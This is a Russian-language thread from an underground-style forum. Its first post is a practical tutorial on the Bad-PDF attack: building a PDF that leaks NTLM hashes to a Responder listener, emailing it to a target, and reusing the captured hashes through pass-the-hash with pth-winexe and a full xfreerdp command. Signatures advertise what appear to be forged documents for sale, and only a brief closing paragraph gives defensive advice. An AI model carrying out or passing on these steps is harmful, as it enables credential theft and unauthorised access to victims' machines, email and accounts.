Перейти к содержимому

Sky Slate Blueberry Blackcurrant Watermelon Strawberry Orange Banana Apple Emerald Chocolate
Welcome to MMGPF - Теневой ресурс о документах, бизнесе, заработке
Зарегистрируйтесь сейчас, чтобы получить доступ ко всем нашим функциям. После регистрации и входа в систему Вы сможете создавать темы, отвечать на существующие темы, давать репутацию другим пользователям, получить свой собственный мессенджер, размещать обновления статуса, управлять профилем и многое другое. Это сообщение будет удалено после входа.
Вход в аккаунт Создать аккаунт
Фотография

Bad-PDF — атака посредством зараженного PDF файла


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 3
Магистр
  • Пользователи
  • 180 сообщений
  • PipPipPipPipPipPipPipPipPipPip
  • Продвинутый пользователь
  • Last active: 18 май 2018 08:13
  • Joined: 10 сен 2013
По мнению исследователей Check Point, вместо того, чтобы использовать уязвимость в файлах Microsoft Word или обработку RTF-файлов Outlook, злоумышленники используют функцию, позволяющую встраивать удаленные документы и файлы в файл PDF. Затем злоумышленник может использовать это, чтобы вставлять вредоносный контент в PDF-файл, поэтому, когда этот PDF-файл открывается, объект автоматически течет учетные данные в виде хешей NTLM.
Как провести атаку?

Запускаем стандартные команды. Я проводил тестирование на Kali Linux:

# git clone https://github.com/deepzec/Bad-Pdf.git
# cd Bad-Pdf
# chmod +x badpdf.py
# python badpdf.py

После этого откроется окно с диалоговым меню. Для работы нам нужно знать IP нашей цели, интерфейс и название файла. После запуска нам необходимо ввести путь респондера, если он не определятся автоматически:

/usr/sbin/responder // 1

Далее указываем IP-адресс (2), название файла (3), и выбираем интерфейс(4). После этого запускается процесс. Если у вас возникают ошибки, возможно указан неправильно интерфейс или его лучше вписать ручками.

 
0*ses6qHzfcH4Jrx5_.png
Bad-Pdf

Если все получилось, переходим к следующему этапу. Нам нужно доставить файл нашей цели. Он находиться в корне папки Bad-Pdf. Это можно сделать через почту, социальные сети или другим способом. Я воспользовался почтой и отправил потенциальной цели.

 
0*PV-b0Z0CJx0pKNDz.png
Загружаем файл на почту и отправляем

Далее ждем запуска. После успешной атаки сразу получаем NTML данные. Примем можно увидеть на скриншоте:

 
0*jDoI9ZtK8hK706rQ.png
Успешное проведение атаки

Таким образом, после успешного завершения мы получаем данные в NTLMv2.

Как можно применять данную уязвимость? pth-winexe

Дело в том, что эта атака более актуальная в корпоративных сетях. В двух версиях протокола NTLM есть большая уязвимость. Для аутентификации достаточно знать только хеш пользователя. Таким образом, получив хеш как показано выше, можно пользоваться всеми преимуществами сети скомпроментированного юзера. Данная методолгия называеться Pass The Hash и первый раз применялась в 1997 году. Самый популярный для реализации этой таки набор утилит Pass-the-Hash Toolkit. Остановимся детальней на pth-winexe, который есть с коробки в Kali Linux.

 
0*rzl1QSMoIdwoykC9.png
Получения доступа с командной строкой FreeRDP

Еще одна утилита из набора — FreeRDP. Это консольный клиент удаленного рабочего стола (Remote Desktop Protocol). Одна из особенностей клиента — это возможность использовать хэша пароля, вместо самого пароля.

Пример команды:

xfreerdp /d:win2012/u:offcec/pth:8846F7EAEE8FB117AD06BDD830B7586C /v:192.168.0.1

где после /d: — имя домена,

после /u: — имя пользователя,

после /pth: — хеш,

после /v: — IP сервера.

 
0*OuyX5EHgrH0G3Dcu.png
Доступ с GUI посредством FreeRDP Windows vs Microsoft
 
0*jW65F0Ff3tj5YRaE.png
Регистрация аккаунте при создание учетной записи Windows

Также современные версии операционной системы Windows предлагают вам создать аккаунт Microsoft. Понимаете цепочку? Что получив возможность авториpоваться в вашей локальной учетной записи с помощью утилиты Bad-Pdf можно пойти дальше упражняться и получить доступ к почте, Skype и других сервисах Microsoft, которые будут использоваться. Поэтому данная уязвимость очень интересная и имеет большой круг применения.

Заключение

Лучше несколько раз проверять ссылки и файлы, которые вы открываете. Это очень важно, так как одно такое открытие может предоставить все данные для хакера. Используйте виртуальные машины, а также шифрование данных во всех случаях. В этом случае достаточно отключить возможность NTLM соединения в групповой политике.

 


  • 1
Качественные документы но умеренным ценам!

Torik
  • Пользователи
  • 76 сообщений
  • PipPipPip
  • Продвинутый пользователь
  • Last active: 15 май 2018 06:29
  • Joined: 23 дек 2014
Очень просто злоумышленники получают доступ к управлению Вашим компом. Будте парни бдительны !
  • 0

Flappy
  • Старичёк
  • 86 сообщений
  • PipPipPip
  • СТАРОЖИЛ
  • Last active: Вчера, 12:39
  • Joined: 21 ноя 2014

Лучше несколько раз проверять ссылки и файлы, которые вы открываете. Это очень важно, так как одно такое открытие может предоставить все данные для хакера. Используйте виртуальные машины, а также шифрование данных во всех случаях. В этом случае достаточно отключить возможность NTLM соединения в групповой политике.


  • 0

Васильевич
  • Пользователи
  • 327 сообщений
  • PipPipPipPipPipPipPipPipPipPip
  • Продавец
  • Last active: 18 май 2018 08:09
  • Joined: 25 май 2012
Нужна даже на ноуте теперь продвинутая защита.
  • 0

Автодокументы, КАЗАХСТАН, БЕЛАРУСЬ, РОССИЯ, УКРАИНА!!!
http://blackcash.pw/...hp?/topic/7967/





Количество пользователей, читающих эту тему: 7

0 пользователей, 7 гостей, 0 анонимных